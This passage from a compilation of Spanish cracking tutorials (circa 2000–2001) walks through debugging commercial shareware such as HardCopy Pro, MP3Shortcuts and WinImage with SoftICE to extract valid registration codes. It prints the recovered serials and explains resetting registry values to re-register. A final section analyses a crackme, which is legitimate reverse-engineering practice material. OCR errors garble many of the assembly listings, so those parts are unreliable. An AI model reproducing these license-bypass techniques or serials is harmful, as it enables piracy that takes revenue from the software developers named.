luego abrimos el programa para ver como luce, y al verlo nos encontramos con una lengúeta que dice! demo, entonces 
vamos ahí y nos encontramos con un botón que dice register now, lo presionamos y al fin estamos en la caja de registro la 
que nos pide los siguientes datos: 


your name: 
your registration code: 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a OK y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


registration failed! 


the registration number you have entered ¡is not valid for your name! check if you have entered all information correctly 
(case sensitive) or visit our website for information about how to get your personal registration code. 


a continuación... cerramos hardcopy pro 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos hardcopy pro y vamos directamente a la caja de registro en donde introducimos nuestro nombre, 
y cualquier código de registro. todavía no damos click en OK ; lo que ahora debemos hacer es presionar control-+d para que 
salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a OK y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 ----- > f12 29 veces para caer aquí... 

015f: 00404003 83f802 cmp eax, 02 

seguimos con f10 hasta una líneas más abajo... 

015f: 00402006 742c jz 00402034 

015f: 00404008 6a00 push 00 

015f: 0040a00a e8s41ffffff call 00409f50 

015f: 0040a00f 833d6c53410001 cmp dword ptr [0041536c] , 01 ----> aquí está lo importante 


ahora nos paramos aquí para comenzar a preguntar y colocamos... 


? edx y vemos esto: 
3433326c 0875770476 '4321' ---> los cuatro primeros números de mi registro falso,invertidos (yo había puesto 12345678) 
entoces colocamos... 


? ecx y vemos esto: 


ahora debemos buscar para encontrar el registro real y para eso colocamos... 
SOL FEE tr] sl 
presionamos enter y en la window data tendremos el registro real ante nuestros ojos... 
rjsl74nwsv 
ya lo hemos hecho, en mi caso la caja de registro quedaría así... 
your name: act mago 
your registration code: rjsi74nwsv 
damos click en OK y... 
thank you for registering hardcopy pro! 


you now have a personalized full version of the program without the limitations of the demo. 


programa crackeado... 
nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 


saludos a profesor x. 
saludos a dek_oin. 
saludos a crkviz. 


saludos a code_ mex. 


saludos a tnt!crack!team ( saludos a xasx, no pararé : ) ) http://www.tntcrackers.ws 


saludos a karpoff ( excelente página loco!!) http://welcome.to/ karpoff 


saludos y agradecimientos a viper del grupo [k-for] , por el genial file inspector. 


saludos a toda la people de tutoriales2000. 
saludos al Idea ( monofeo (gran amigo), flaco, chirda, taza, afo, solerman, nasal, piter y 
saludos a todos los crackers del mundo. 


chaoj¡¡¡i 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 
recuerden, lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


13/12/00 act mago__ 16 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa . MP3Shortcuts v1.0 
PROTECCION: Name / Serial. 
Objetivo: Conseguir un código de registro válido. 
Descripcion: Crea enlaces a tus MP3 favoritos. 
Dificultad: Newbie. 
DOWNLOAD : http: //www.heathcosoft.com 
Herramientas: File insPEctor v3.5 y Softlce v4.05 
CRACKER: Act Mago FECHA: 17/12/2000 
INTRODUCCION 


hola amigos, presento mi décimo quinto tutorial.ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
en este tutorial usaremos el softice. si no lo tienes instalado puedes bajártelo en www.crackstore.com . asumo 
que tienes conocimientos básicos sobre el uso de softice. y para terminar con la intro debo decir : este texto ha 
sido escrito sólo con propósitos educacionales. 


al atake 


comentario del programa 


crea enlaces a tus mp3 favoritos. 


es una sencilla utilidad para crear una especie de acceso más rápido a tus mp3 y listas de estos. se integra con winamp a la 
perfección y apenas ocupa lugar en tu sistema, instalándose en la barra de tareas de tu pc. no hemos encontrado este 
programa como esencial, pero tienes 30 días para probarlo por ti mismo y juzgar, puede que se adapte a tus necesidades. 


comentario extraído desde www.softonic.com debido a que no he tenido tiempo para probar el programa. 


el programa es shareware con libre prueba de 30 días. ..obviamente si quieres seguir usándolo después de ese período 
deberás pagar la suma de $15us : ( 


contamos con softice... :) 


manos a la obra 


antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa, bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c ++5.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos mp3shortcuts v1.0 


luego abrimos el programa para ver como luce, pero este queda instalado en la barra de tareas, entonces vamos al menú 
que este tiene y le damos click a enter registration code y estaremos en la caja de registro, la que nos pide los siguientes 
datos: 


registration name: 
registration code: 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a register y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


the registration name and registration code pair you entered is incorrect. 


verify your registration information and try again. if you continue to encounter problems, report them at 
www. heathcosoft.com 


a continuación... cerramos mp3shortcuts v1.0 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 
a continuación...abrimos mp3shortcuts y vamos directamente a la caja de registro en donde introducimos nuestro nombre, 
y cualquier código de registro. todavía no damos click en register ; lo que ahora debemos hacer es presionar 


control+dpara que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx getwindowtexta y presionamos enter, luego presionamos f5 para salir del 
softice. ahora le damos click aregister y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez, ponemos bc * para quitar el bpx y si todo sale bien estaremos aquí: 
015f: 00401438 57 push edi 
ahora presionamos f10 24 veces para llegar a una parte realmente importante del código: 


015f: 00401483 50 push eax -> d eax =zzlzmlbrvlukbtft, d ebx =nuestro registro falso. 


015f: 00401484 53 push ebx -> lo mismo de arriba 
015f: 00401485 ff154c904000 call [kernel32! Istremp] ->cmp dice algo :) 
015f: 0040148b 85c0 test eax,eax -> algo se prueba :) 
015f: 0040148d 0f858c000000 ¡nz 0040151f -> salto bueno, nos manda al mensaje de registro válido. compruébalo con r fl z 
ya lo hemos hecho, fue realmente sencillo... 
015f: 00401483 50 push eax -> d eax =zzlzmlbrvlukbtft------ > nuestro registro válido :) 
en mi caso la caja quedaría así: 
registration name: act mago 
registration code: zzlzmlbrvlukbtft 
le damos click a register y... 
thank you for registering mp3shortcuts. 


restart the program in order to enable the registered features 


programa crackeado... 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoUhotmail. com 


saludos 
saludos a profesor x. 
saludos a dek_oin. 
saludos a crkviz. 


saludos a code_ mex. 


saludos a tnt!crack!team ( saludos a xasx, no pararé : ) ) http://www.tntcrackers.ws 


saludos a karpoff ( excelente página loco!!) http://welcome.to/ karpoff 


saludos y agradecimientos aviperde! grupo [k-for], por el genial file inspector. 


saludos a toda la people detutoriales2000. 


saludos al Idea ( monofeo (gran amigo), flaco, chirda, taza, afo, solerman, nasal, peter y a todos los demás) 


saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Winimage 5.0 


Código de registro 

Conseguir el código de registro tanto para la versión Profesionál como para la Estándar. 
Utilidad para la gestión de imagenes de disco. 
Aficionado 

wWww.winimage.com 

Softice W32dasm 


Txeli FECHA: 16/12/2000 


INTRODUCCION 
winimage es un programa que nos permitirá hacer una imagen de nuestros discos. 


existen dos versiones of winimage : estándar y profesional. 


las opciones de registro son diferentes : 
winimage 5.0 profesional - precio para nuevos usuarios de winimage $60. 
winimage 5.0 estándar- precio para nuevos usuarios of winimage $30. 


winimage 5.0 developer edition - precio para nuevos usuarios $200 


"o gratis al adquirir el softice ;-)" 


- propiedades de archivo- permite la modificación de las fechas de archivo en el interior de la imagen. 

- es posible exportar el directorio de la imagen actual en texto o html. 

- impresión del directorio de la imagen 

- edición de las propiedades del sector de arranque (i.e. cargar otro archivo de sector de arranque, editar 
texto en el sector de arranque...) 

- soporta la creación de grandes imágenes de medios removibles o discos duros bajo windows nt y windows 95. las 
imágenes grandes (> 2.88 mb) no se cargan en memoria, realizándose las operaciones de lectura escritura 


directamente en 


el archivo imagen. 


"sacado de la ayuda del programa." 


bueno, así que 60$ la versión profesional. con ese dinero podríamos tomarnos unas cervezas con los colegas ¿no? 
pues vamos a ver si nos lo podemos ahorrar. 


al atake 


vamos a ver que sorpresas nos depara el programa. arrancamos como siempre, y al principio nos muestra una pantalla 
diciéndonos que los días que nos quedan de evaluación, así como que no nos olvidemos de registrarlo. no hijo no, si 
precisamente es eso lo que queremos, registrarnos :-) 


abrimos el ejecutable con el w32dasm, y echamos un vistazo a las strgref. 


string resource id=01061: 
string resource id=01062: 
string resource id=01063: 
string resource id=01064: 
string resource id=01065: 
string resource id=01066: 
string resource id=01067: 
string resource id=01069: 
string resource id=01070: 
string resource id=01071: 
string resource id=01072: 
string resource id=01073: 
string resource id=01074: 
string resource id=01075: 
string resource id=01078: 
string resource id=01079: 
string resource id=01081: 


"browse" 

"disk error on track %lu, head % lu" 

"always on átop" 

"do you want to inject %lu files occuping %lu bytes?" 
"inject" 

"your registration code is valid.you are now a registered" 
"registering information is invalid" 

"winimage registration" <--- doble click aquí 
"increment" 

"name" 

"size" 

"date" 

"time" 

"insert floppy n* %lu to read" 

"batch assistant" 

"you must fill the image set filename text" 

"wave file(*.wav)|*.wav| midi file(*.mid;*.rmi)|*.mid;*. rmil" 


apareceremos aquí: 


:0042f0e1 “7529 
:0042f0e3 6800200000 


:0042f0e8 6824040000 

:0042f0ed 8935b43£4400 
:0042f0f3 893500c414400 
:0042f0f9 88151834400 


* possible reference to string resource id=010609: 


jne 0042f10c 
push 00002000 


"winimage registration" 


push 0000042d <-- aquí aparecemos 
mov dword ptr [00443fb4], esi 

mov dword ptr [0044410c], esi 

mov byte ptr [00443d18], dl 


si subimos un poco, nos encontramos 2 saltos condicionales, los cuales si cambiamos, nos mostraran el mensaje de 
“your are registered to use both winimage standard and profes" que en cristiano, viene a decir mas o menos, que ahora 


somos usuarios registrados tanto de la versión estándar como de la profesional . 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:0042f0c1(c) 


| 

:0042f0c9 3915ac404400 cmp dword ptr [004440ac], edx 
:0042f0cf 890438434400 mov dword ptr [00444338], ecx 
:0042f0d5 7505 ¡ne 0042f0dc ;12 salto 
:0042f0d7 a338434400 mov dword ptr [00444338], eax 


* referenced by a (u)nconditional or (c)onditional jump at address: 


|:0042f0d5(c) 

| 

:0042f0dc 6a01 push 00000001 

:0042f0de 3bc2 cmp eax, edx 

:0042f0€0 5e p esi 

:0042f0e1 7529 jne 0042f10c ¿22 Salto 
:0042f0e3 6800200000 push 00002000 


¡pero....... ! el programa sigue sin estar registrado, de hecho nos sigue apareciendo la nag, y nos sigue contando el tiempo de 
evaluación, así que ¡acercamiento incorrecto! un poco mas arriba de los saltos vemos una llamada, ¿será la llamada a la 
rutina de comprobación? 


:0042f09c ff7508 push [ebp+08] 

:0042f09f ffd6 call esi 

:0042f0a1 68e8404400 push 004440e8 

:0042f0a6 57 push edi 

:0042f0a7 53 push ebx 

:0042f0a8 e81c570000 call 004347c9 ¡la llamada 
:0042f0ad 8b0de8404400 mov ecx, dword ptr [004440e8] 
:0042f0b3 83c40c add esp, O000000c 
:0042f0b6 33d2 xor edx, edx 

:0042f0b8 a3dc3e4400 mov dword ptr [00443edc], eax 
:0042f0bd 3bc2 cmp eax, edx 

:0042f0bf 5f pop edi 


comprobémoslo con el sice, a fin de cuentas lo que nos interesa es conseguir un serial valido. 


cargamos como siempre nuestra victima, y al saltar el sice, ponemos nuestro breakpoint con bpx 0042f0a8, ctrl + d y salimos 
del sice. vamos a opción > registrarse... y metemos nuestros datos, en mi caso: 


nombre: txeli k-for 
código de registro: 123456789 


damos a aceptar, y aparecemos en el sice, concretamente aquí: 


:0042f0a7 53 push ebx 

:0042f0a8 e81c570000 call 004347c9 ¡aquí aparecemos 
:0042f0ad 8b0de8404400 mov ecx, dword ptr [004440e8] 
:0042f0b3 83c40c add esp, O000000c 

:0042f0b6 33d2 xor edx, edx 

:0042f0b8 a3dc3e4400 mov dword ptr [00443edc], eax 

:0042f0bd 3bc2 cmp eax, edx 

:0042f0bf 5f pop edi 

:0042f0c0 5b pop ebx 


:0042f0c1 7406 je 0042f0c9 
:0042f0c3 890dac404400 mov dword ptr [004440ac], ecx 


pulsamos f8, para entrar en la call, y nos encontramos con esto: 


:00434'7c9 55 push ebp ¡introduce nombre en la pila 

:00434'7ca 8bec mov ebp, esp 

:004347cc 8lec00020000 sub esp, 00000200 

:00434'7d2 56 push esi 

:004347d3 8b7510 mov esi, dword ptr [ebp+10] 

:00434'7d6 85f6 test esi, esi 

:004347d8 57 push edi ¿introduce serial en la pila 
:00434 709 7403 je 004347de 

:004347db 832600 and dword ptr [esi], 00000000 


vamos trazando con "f10", para ver que nos encontramos, y mirando los registros con "d" poco mas abajo, encontramos una 
llamada a la dirección 004346cd, (:004347e8 eSe0feffff call 004346cd) entramos en ella con f8 y aparecemos aquí: 


:004346cd 80442408 mov eax, dword ptr [esp+08] 
:004346d1 803820 cmp byte ptr [eax], 20 ¿d eax ---> txeli k-for 


; comprueba nuestro nombre 
Sin f10 hasta llegar a: 


:004347f5 8bf8 mov edi, eax ¿volvemos a comprobar 
:004347f7 83c40c add esp, 0000000c ¿d edi ---> 123456789 nuestro serial falso 


Sais f10 hasta llegar a: 


:004348la 59 pop ecx ¿saca ecx de la pila, pero ¿que tiene ecx? 
:0043481b 59 pop ecx ¿d ecx ---> 109chf57 
:0043481c 50 push eax ¡parece nuestro serial correcto ;) 


pues ya está, borramos los breakpoints con "bc*" abrimos el programa, y nos registramos, 


“your registration code is valid. 
you are now a registered us" 


vamos a opción > modo de selección de winimage, y vemos que pone, "you can use the standard version, or test the 
professional " que en cristiano, quiere decir que estamos registrados solo para la versión estándar. 


¡pero no es eso lo que yo estoy buscando! yo quiero registrar las dos versiones. así que, vuelta a empezar. pero, antes 
tendremos que volver a ser usuarios no registrados. para eso, tendremos que borrar los valores que introduce winimage en el 
registry de windows al registrarnos. para eso, abrimos el regedit, (yo haría una copia de seguridad del registro, por lo que 
pueda pasar, pero como el pc es tuyo, pues tu mismo), vamos a hkey_current_usen softwarelwinimage 


cambiamos el valor "winimageuseregistry" de true a false,( botón derecho sobre el valor, modificar) modificamos los valores 
de "nameregistered" y "coderegistered" para que queden vacíos, y ya tenemos la versión de evaluación de nuevo. 


— en busca del serial perdido E 


cargamos nuevamente winimage, al saltar el sice ponemos nuestro breakpoint (bpx 0042f0a8) e intentamos registrarnos otra 
vez con el numero falso, ya que es mas fácil de rastrear. 


:0042f0a7 53 push ebx 
:0042f0a8 e81c570000 call 004347c9 ¡aquí aparecemos 
:0042f0ad 8b0de8404400 mov ecx, dword ptr [004440€8] 


ais f8 para entrar y f10 hasta llegar a: 


:0043481b 59 pop ecx ¡aquí nos quedamos antes 


seguimos trazando con f10, y mirando lo que contienen los registros con el comando "d". 


:00434832 50 push eax 


:00434833 8d8748190514 lea eax, dword ptr [edi+14051948] ¡introduce nuestro serial en la pila 
:00434839 50 push eax ¿d eax ---> 123456789 

:0043483a 8d8500feffff lea eax, dword ptr [ebp+fffffe0O] 

:00434840 50 push eax 

:00434841 es36ffffff call 0043477c ¡llamada para comprobar nuestro serial 

:00434846 59 pop ecx 

:00434847 59 pop ecx ¿d ecx ---> 24alab9f otro n2 para la versión estándar 


seguimos buscando, recuerda que queremos la versión profesional, así que... f10, y a ver que encontramos. llegamos a: 


:00434868 50 push eax ¡Introduce nuestro serial en la pila 
:00434869 eso0effrfff call 0043477c ¡llamada de comprobación del serial 
:0043486e 59 pop ecx 

:0043486f 59 pop ecx ¿d ecx ---> 27a2aba8 n* para la estándar 


;pues seguimos buscando 


iia e f10 hasta llegar a: 


:00434890 50 push eax ;¿te suena? :) 

:00434891 eseofeffff call 0043477c 

:00434896 59 pop ecx 

:00434897 59 pop ecx ¿d ecx ---> 20alabdb n* para la version profesional ¡bingo! 


¡pero si habia varios n2 para la star, 
¿por que no para la profesional? seguimos buscando 


E f10 hasta llegar a: 


:004348b8 50 push eax ¿de nuevo el mismo patrón 

:004348b9 e8befeffff call 0043477c 

:004348be 59 pop ecx 

:004348bf 59 pop ecx ¡d ecx ---> 149dabec n2 para la estándar :) 


tae f10 hasta llegar a: 


:004348e5 50 push eax ;y ota vez mas lo mismo 

:004348e6 e891feffff Call 0043477c 

:004348eb 59 pop ecx 

:004348ec 59 pop ecx ¿d ecx ---> 12a2abee n? para la profesional :) 


seguimos buscando, pero parece que se acabó. ¿que te parece? nada menos que 6 números de serie, todos distintos, y todos 
validos para el mismo nombre de usuario. ¿porqué? 


parece que el programa coge nuestro numero, y nuestro nombre, genera a partir de ellos el numero de serie correcto, y lo 

compara con el nuestro, si es valido, nos saca el mensaje de "usuario registrado", si no lo es, empieza a comprobar si es de 
la versión estándar o de la profesional, y si no me equivoco, alguno de los que genera debe de ser también el de la developer 

edition, la verdad es que no lo he comprobado, pero si alguien lo hace, por favor que me lo diga, es por simple curiosidad. 


bueno, pues como decía la ventana inicial "no olvides registrarte”. 


te recuerdo, que si te gusta el programa, debes comprarlo ya que el shareware es nuestra mejor fuente de experimentación. 


toda la información aquí mostrada es exclusivamente materia de aprendizaje, no me hago responsable de lo que puedas 
hacer con ella, ni lo que pueda pasar a tu equipo si lo haces mal. 


para conseguir mas material para aprender, visita mi pagina y la de mi grupo, ahí encontraras todo lo necesario para 
aprender. 


quiero agradecer con este tutorial la ayuda que me están dando en este mundillo mis amigos, el profesor x, sin la ayuda del 
cual este tutorial no habría sido posible, [dek_oin] gracias por tus consejos maestro, y todos los miembros de k-for entre 
otros, (disculpad que no ponga todos los nombres aquí, pero entonces la lista seria tan larga como el tutorial) y por supuesto 
a ti, que me estás leyendo. 


p.d. no crackeamos, ni por dinero, ni bajo pedido, así que los e-mails del tipo, "dime como se crackea tal 
programa", "¿puedes enseñarme a crackear en 5 min.? necesito crackear una mochila (pure+blood, esto va 
por ti)" o "te doy x$ por crackear este programa" serán automáticamente eliminados, o peor aun, los 
incluiremos en una lista con tu nombre y dirección de e-mail para que seas el blanco de todas nuestras bromas 


:-) 


txeli: 


http: //club.telepolis. con/txelienlinea/index. htm 
txeli_enlineaiHhotmail.com 


grupo k-for: 
http: //pagina.de/kfor 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


Karpoff Spanish Tutor 2001 


TODOS LOS DE SOFTWARE BY DESIGNE 


PROTECCION: Serial, Límite de Tiempo 

Objetivo: Encontrar el serial válido 

Descripcion: Sin palabras :( 

Dificultad: Facilísima 

DOWNLOAD: http: //www.gregorybraun.com 

Herramientas: Softice 

CRACKER: BYtEsKrAcK FECHA: 14/11/2000 


introduccion 


este es mi primer tutorial que realizo asi que por favor disculpenme por cualquier error que pueda tener, a 
parte de que no sé, en qué programa abran creado esta plantilla pues no puedo ver que estoy escribiendo... 


aaahhh!!! perdonen la falta de ortografiá pero si leyeron lo anterior comprenderan.... 
regularmente no escribo tan mal.... 


al atake 


otra pantalla oscura.... bueno, esperenme me voy a cambiar de programa.... ok. 


ya está, el bloc de notas sirve para algo... bueno basta de bla, bla y vamos a lo que nos interesa, espero que ya hayas 
descargado el programa que deseas de la página de gregory braun, bueno pues empezaremos por lo más sencillo... 


inicia el programa que escogistes en mi caso fxedit, lo inicio y ya cargó... ok. 


primero ingreso un user name  = byteskrack 
segundo ingreso un organization = me! <- esto por que no estoy en ningún grupo crack 
tercero ingreso un registration = 123456  <- mi numero de serie no válido, me explico 


seguro ya sabrás que es un número de serie o serial...? :) 
bueno, ya que tenemos todo eso iniciamos softice presionando ctrl+d y colocamos un break point que llame a la 


función getdlgitemtexta esta es una función que está en user32.dll si no estoy mal, la sintaxis que deben colocar en la 
línea de comandos es la siguiente, 


bpx getdlgitemtexta <-seguro ya saben esto 


ya que hemos hecho esto volvemos a nuestra victima presionando ctrl+d (no olviden puede ser la que quieran, siempre 
y cuando este en gregorybraun.com), y presionamos el botón ok. 


y guuuaaaa!!!! de pronto nos aparece softice de acuerdo, presionemos ahora una vez f12, y aqui empieza lo 
emocionante... presionemos otra vez f12 y ahora escribamos el commando d esi y nos deberá aparecer en la ventana de 
caracteres nuestro user name y organization, volvamos a presionar f12 y de aqui en adelante presionemos 16 veces f10 
y voila!!!! (si en 16 veces no llegan seguramente habrá cambiado la direccion de comparacion pero no se preocupen 
sigan y vayan despacio y más adelante la encontrarán) 


debimos de haber aterrizado en 

0000:00000000 3bc3 cmp eax,ebp 

la direccion de memoria puede variar... 

ahora escribamos... 

?ebp -> nuestro número de serial no válido... en mi caso 123456 
ahora escribamos... 

? eax -> nuestro número de serial válido... en mi caso 10020083 
no olvidemos quitar el bp que pusimos... 

bc * 

presionemos ctrl+d y volvamos a nuestra victima... 

clickeamos en ok y ahora ingresamos el serial válido para nuestro nombre y ya está... 
estamos registrados... y además nos agradecen 


no olviden que esto no es con fines comerciales, si les gusta el programa es mejor que lo compren, este tutorial ha sido 
realizado para uso educacional y unicamente para demostrar lo fácil que resulta desbloquear una serie de aplicaciones 
de un mismo autor. (a veces) 


saludos a todos los buenos amigos, este tutorial está dedicado a mi wife and baby!!! 


byteskrack 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


PROTECCION: 


Karpoff Spanish Tutor 2001 


Programa: NI2CRACKME 


Encriptación del código, sólo el serial bueno lo desencripta 


Objetivo: Encontrar el serial. 
Descripcion: Un Crackme con muy mala leche. 
Dificultad: Aficionado 
DOWNLOAD: ni2crackme 
Herramientas: Masm, Sice y PUPE (opcional) 
Crack el Destripador € Marmota 
CRACKER: FECHA: 22/01/2001 


introduccion 


el incrackeable... 

así se llamo durante mucho tiempo este crackme... 

personalmente opino que no hay nada incrackeable, todo es cuestión de tiempo y 
constancia. pero este crackme ha estado mas cerca de esta calificación que 
cualquier otro programa que (por lo menos yo) conozca. 


es tal su singularidad, que no tiene ningún tipo de protecciones añadidas, como 
pudieran ser los típicos anti-debug, anti-dump, anti-desensamblador, etc. (y ni 
puñetera falta que le hace). tan solo, puro y “simple” asm. 


la clave a buscar debe de reunir unas determinadas características. según el 
autor: 


la clave contiene 8 letras (caracteres entre a-z), es decir, caracteres del alfabeto español, 
tanto mayúsculas como minúsculas) 
tampoco existen espacios 
la palabra no aparece en el diccionario (p.e.: holapepe, no esta en el diccionario :-)) 


con estos datos es fácil calcular el numero de combinaciones posibles. 26 
mayúsculas + 26 minúsculas = 52 caracteres posibles. 


como son 8 letras serian: 528 = 5,345972853146e+13 o sea 53.459.728.531.460 
que traducido al cristiano serian 53 billones 459 mil millones y pico. vamos... 
para desanimar a cualquiera. xdddddddddddd. 


mas adelante, y gracias a nuevas pistas proporcionadas por el autor, esta 
cantidad se redujo considerablemente. la primera letra empezaba por “h”. esto 
nos dejaba el numero de combinaciones posibles en tan solo 1.028.071.702.528 , 
poca cosa... 1 billoncete 28 mil millones de nada. 


esta clave es imprescindible para desencriptar un pedacito de código, donde se 
ocultan las instrucciones y los datos necesarios para la presentación de la 


messagebox que nos anunciara nuestro éxito. 
al atake 


vamos a omitir la presentación del listado asm completo, solo pondremos los bloques que nos interesan para 
comprender la forma con que trabaja este endiablado engendro (a falta de otros calificativos ;-)). 

esta es la rutina principal de desencriptación. se utiliza 3 veces en el programa, (luego veremos para que). este es el 
listado original de la zona del código por la que pasa la cadena introducida. cuando se llega a ella la 1? vez, esi apunta 
al buffer donde se ha guardado la clave introducida en el control de edición y eax vale 0. 


0187:004012fe 33c0 xor eax,eax 
0187:00401300 51 push ecx 

0187:00401301 56 push esi 

0187:00401302 52 push edx 

0187:00401303 33d2 xor edx,edx 
0187:00401305 4e dec esi 

0187:00401306 46 inc esi 

0187:00401307 3226 xor ah,[esi] 
0187:00401309 32c2 xor al,dl 
0187:0040130b 052032494e add eax,4e493220 
0187:00401310 8ac8 mov cl,al 
0187:00401312 d3c8 ror eax,cl 
0187:00401314 355a5aaa55 xor eax,55aadada 
0187:00401319 664a dec dx 

0187:0040131b 75ec jnz 00401309 
0187:0040131d 803e00 cmp byte ptr [esi],00 
0187:00401320 75e4 ¡nz 00401306 
0187:00401322 5a pop edx 

0187:00401323 5e pop esi 

0187:00401324 59 pop ecx 

0187:00401325 c3 ret 


resumiendo... estas pocas instrucciones provocan 9 bucles de ffff veces cada uno (uno para cada letra + el del final) la 
comprobación de que se ha llegado al final de la cadena se produce después de que la instrucción 401306 inc esi 
apunte a un byte de valor 0, y realice toooodo el bucle ffffh veces otra vez. | resultado de todo este barullo es devuelto 
en eax, y para que la cadena sea considerada como valida tiene que cumplir la condición 

eax = 84aeb79e. 


0040121e cmp eax, 84aeb79eh 
00401223 jz 40123d 


llegados a este punto y en vista de la descomunal cantidad de instrucciones que debe procesar la máquina para pasar 
todas las combinaciones posibles 9 veces por este fragmento de código, es fácil pensar, o al menos así lo creyó ni2, que 
es imposible dar con la combinación buena, por ese motivo queremos hacer especial hincapié en la necesidad de 
aligerar lo máximo posible el código que busque el serial adecuado, de lo contrario probablemente moriríamos de 
viejos antes de dar con él. también comentaros que tan solo una combinación hace que se desencripte el código a 
ejecutar. no penséis que invirtiendo el salto o forzándolo vais a conseguir algo... xdddd. bueno, sí conseguiríais un 
cuelgue, y con un poco de suerte tener que reiniciar el trasto. jeje. 

he intentado revertir la función, es decir, hacer que empiece por el final, y repita todo el ciclo al revés. pero al llegar a 
la instrucción xor ah, [esi] estaba igual que al principio, tendría que poner todos los valores posibles donde apunta esi 
en ese momento y el resultado seria peor. 

si la cadena introducida no pasa este test, nos tira de un patadon a la calle, y si pasa el test nos lleva a un lugar de lo 
más interesante. 


¿Quién tiene la clave? 
como en casi todas las películas, la clave la tiene eax. pero... 


0040123d mov eax, 40124e ;puntero al código encriptado 
00401242 mov ecx, 68h ;n* de bytes a cambiar 

00401247 mov edx, esi ¡puntero al buffer donde esta la clave 
00401249 call 401326 


empieza la movida... esta vez eax vale 48415348 antes de entrar en la rutina principal. siiii esa de los bucles sin fin. 


00401326 pusha 

00401327 mov edi, eax 
00401329 mov esi, edx 
0040132b mov eax, 48415348h 
00401330 xor al, [esi] 
00401332 call 401300 


resultado... al entrar en la rutina con un valor eax distinto de 0, el resultado ya no es nuestro querido 84aeb79e, si no 
otro distinto, a saber... 


00401337 mov ebx, eax 
y ese resultado se carga en ebx, que luego servirá para la desencriptacion. 


00401339 xor ah, [esi] 
0040133b call 401300 


otro xor y otra llamada a la super rutina. que nos devuelve un nuevo valor para eax, y ya esta... ya se puede 
desencriptar el churro. 

al llegar aquí tenemos que edi apunta a la zona encriptada, en ebx tenemos el valor devuelto por la 2* llamada a la 
super rutina, en eax, el valor de la 3* llamada y en ecx el n* de bytes a desencriptar. 


00401340 shr ecx, 2 
00401343 mov edx, ecx 
00401345 xor [edi], eax 
00401347 mov cl, al 
00401349 add edi, 4 
0040134c rol ebx, cl 
0040134e xor eax, ebx 
00401350 mov cl, bh 
00401352 ror eax, cl 
00401354 add ebx, eax 
00401356 dec edx 
00401357 ¡nz 401345 
00401359 popa 
0040135a retn 


atacando por los flancos 


se podría intentar un ataque en esta zona, dando por supuestas las primeras instrucciones que se deben ejecutar para la 
presentación de una messagebox (de eso se trata ¿no?). tengo referencias de que metamorfe consiguió desencriptar esta 
zona de código (aun no se como, ya que no conozco ningún escrito ni tute explicando como y donde). la teoría seria la 
siguiente: 


instrucciones necesarias para una messagebox 


6400 push O ¡botón aceptar mb_ok 

ÓSXXXXXXXX push xxXXxxxx ¡puntero al caption 
ÓSXXXXXXXX push XxXxxxxx ;puntero al texto 
6400 push O ;handle del dialogo 

e8xxxxxxxx call xxxxxxxx ;llamada a la función 


las x sustituyen las direcciones donde se deberían encontrar los datos correspondientes. sabemos que deberían estar 
entre la dirección 0040124e y 0040124e + 68h (¿recordáis el n* de bytes a desencriptar?)= 004012bS5. si afinamos mas, 
podíamos descontar los bytes necesarios para completar la función de messagebox. vamos... que las direcciones donde 
se podría esconder el caption y el mensaje estarían entre 00401261 y 004012b5. 


nos hacen falta solo los 8 primeros bytes en 2 dwords, una para la primera eax y otra para la segunda eax (tranki... ya 
me explico). 


6a0068xx 


en este caso las xx pueden tomar un valor entre 61h y b5h. 
y XXXXxXx08 
aquí no hay problema, las x solo pueden valer 124000. 


y ahora los valores que tenemos en la zona protegida son: 
0975ef94 y 2b3c11c7 


xoreando 0975ef94 xor 620068xx = 637587xx 

para obtener todos los valores posibles (xx estará entre 61h y b5h) solo hay que hacer operaciones. xdddddd 

xoreando 2b3c11c7 xor 12400068 = 397c1 laf 

ok, volvemos a la rutina anterior. en el primer ciclo, eax debe valer xx877563 y al completar el primer ciclo eax valdrá 
af117c39 


00401340 shr ecx, 2 
00401343 mov edx, ecx 
00401345 xor [edi], eax 
00401347 mov cl, al 
00401349 add edi, 4 
0040134c rol ebx, cl 
0040134e xor eax, ebx 
00401350 mov cl, bh 
00401352 ror eax, cl 
00401354 add ebx, eax 
00401356 dec edx 
